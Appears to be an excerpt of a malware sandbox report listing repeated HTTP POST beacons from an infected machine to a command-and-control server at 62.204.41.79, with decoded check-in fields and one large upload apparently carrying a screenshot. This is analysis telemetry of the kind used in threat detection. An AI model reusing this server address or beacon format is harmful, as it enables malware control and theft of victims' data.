Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
